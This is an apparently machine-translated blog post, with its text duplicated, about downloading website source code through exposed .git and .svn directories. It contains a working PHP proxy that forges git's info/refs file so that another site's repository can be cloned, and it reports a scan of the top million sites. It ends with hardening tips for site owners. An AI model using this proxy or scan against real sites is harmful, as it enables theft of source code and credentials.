How I downloaded the source of my own site
In September 2009, an article was published about the subversion version control system vulnerability, which allows to download source codes of sites using SVN. From time to time there was nothing to do, my brain wanted me to write a grabber and check the relevance of this threat at the moment, but it was somehow lazy. However, I was haunted by the comment of habrayuzer Semenov
It is clear that every schoolchild has already tried to download% sitename% via .svn, because I refused this idea right away, but I tried to git clone% sitename% /. Git / my hands.
For starters, I turned off 404 on .git * on my own site and created a git repository in a public directory ...
')
Now you can try to get the newly created repository.
As it turned out, not everything is so simple. In order for the repository to be cloned in this way, you need to run git update-server-info in the folder with the project, which for obvious reasons I can’t do.
It turns out that for the implementation of the planned need only one file .git / info / refs, containing a hash commit for HEAD.
Since the commit hash can be obtained from .git / refs / heads / master, then you can simply make a proxy script that will give up what git expects to receive. I have a very simple PHP script. I just created a controller in my Yii2 project as follows:
And added rule to urlManager
Now I can try to clone my own site using my own site.There should be a joke about the monitor
We try
Happened! After that, I checked this method on the sites - giants, got what was expected. Nothing. Then I took a list of the million most visited sites on the Internet and went through it all. I expected to get a lot of source code, but only 1 download from 1 milionion of downloads. I got .git / refs / heads / master with a hash of a commit from 126 sites, but the repository could not be cloned because the routing system of these sites betrayed 404.
I was expecting more, of course, so I decided to check how many more or fewer sites can be downloaded via .svn. I found a grabber on a python, set up the same list of a million sites and launched it. Several hundred sites downloaded.
And in conclusion I will give some tips.
For obvious reasons, I cannot say exactly which sites managed to be cloned, but I can say for sure that the owners of these sites have already received a letter in which I pointed out a flaw.
UPD:
kaimi_ru shared a link to scripts for 5 version control systems github.com/kost/dvcs-ripper
It is clear that every schoolchild has already tried to download% sitename% via .svn, because I refused this idea right away, but I tried to git clone% sitename% /. Git / my hands.
For starters, I turned off 404 on .git * on my own site and created a git repository in a public directory ...
')
$ git init && git add . && git commit -m 'Test'
Initialized empty Git repository in /home/ilyaplot/data/www/web/.git/
[master (root-commit) d3dcdf3] Test
15 files changed, 713 insertions(+)
.....................
Now you can try to get the newly created repository.
$ git clone http://******.com/.git/
Cloning into '******.com'...
fatal: http://'******..com/.git/info/refs not found: did you run git update-server-info on the server?
As it turned out, not everything is so simple. In order for the repository to be cloned in this way, you need to run git update-server-info in the folder with the project, which for obvious reasons I can’t do.
It turns out that for the implementation of the planned need only one file .git / info / refs, containing a hash commit for HEAD.
Since the commit hash can be obtained from .git / refs / heads / master, then you can simply make a proxy script that will give up what git expects to receive. I have a very simple PHP script. I just created a controller in my Yii2 project as follows:
header("Content-Type: application/octet-stream"); if (preg_match("/^(?P<host>[\w\-\.]+)\/(?P<url>.+)/isu", $host, $matches)) { if ($matches['url'] == 'info/refs') { $ref = file_get_contents('http://' . $matches['host'] . '/.git/refs/heads/master'); $ref = trim($ref); echo "{$ref}\trefs/heads/master {$ref}\trefs/remotes/origin/HEAD {$ref}\trefs/remotes/origin/master "; } else { echo file_get_contents('http://' . $matches['host'] . '/.git/' . $matches['url']); } exit(); } And added rule to urlManager
[ 'pattern' => 'git/<host[\w\-\.\/]+>', 'route' => 'git/index', 'suffix' => '', ], Now I can try to clone my own site using my own site.
We try
$ git clone http://******.com/git/******.com
Cloning into '******.com'...
$ ls ******.com/
assets css favicon.ico images js robots.txt sitemaps
Happened! After that, I checked this method on the sites - giants, got what was expected. Nothing. Then I took a list of the million most visited sites on the Internet and went through it all. I expected to get a lot of source code, but only 1 download from 1 milionion of downloads. I got .git / refs / heads / master with a hash of a commit from 126 sites, but the repository could not be cloned because the routing system of these sites betrayed 404.
I was expecting more, of course, so I decided to check how many more or fewer sites can be downloaded via .svn. I found a grabber on a python, set up the same list of a million sites and launched it. Several hundred sites downloaded.
And in conclusion I will give some tips.
- Now check the availability of /.git/index on your site through a regular browser.
If you have not received 403 or 404, then the following points are for you. - Set up your server so that it returns 404 to .svn and .git.
- Bring the source code of the site, which should not be received by the client outside the public directory.
- It may be worth changing the passwords that are used in the configs, access to the admin panel url, remove the service scripts from the public directory.
For obvious reasons, I cannot say exactly which sites managed to be cloned, but I can say for sure that the owners of these sites have already received a letter in which I pointed out a flaw.
UPD:
kaimi_ru shared a link to scripts for 5 version control systems github.com/kost/dvcs-ripper
Source: https://habr.com/ru/post/334864/
All Articles